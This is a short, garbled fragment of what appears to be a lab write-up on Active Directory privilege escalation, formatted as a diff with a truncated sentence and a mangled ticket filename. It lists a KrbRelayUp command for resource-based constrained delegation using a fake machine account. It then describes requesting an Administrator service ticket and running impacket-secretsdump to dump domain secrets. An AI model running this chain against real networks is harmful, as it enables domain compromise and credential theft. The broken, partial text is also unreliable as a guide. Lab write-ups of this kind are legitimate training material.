linux

 ./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn daz$ -cp Password123@

 We’ll then execute the command provided so that a TGT request can be sent to the KDC.
-This allows us to use getST after this command to retrieve a TGS on behalf of the Administrator account to CIFS using our fake machine account.
+This allows us to use getST

-export KRB5CCNAME=Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
+export KRB5CCNAME=Administrator@[email protected]

 impacket-secretsdump -k brunodc.bruno.vl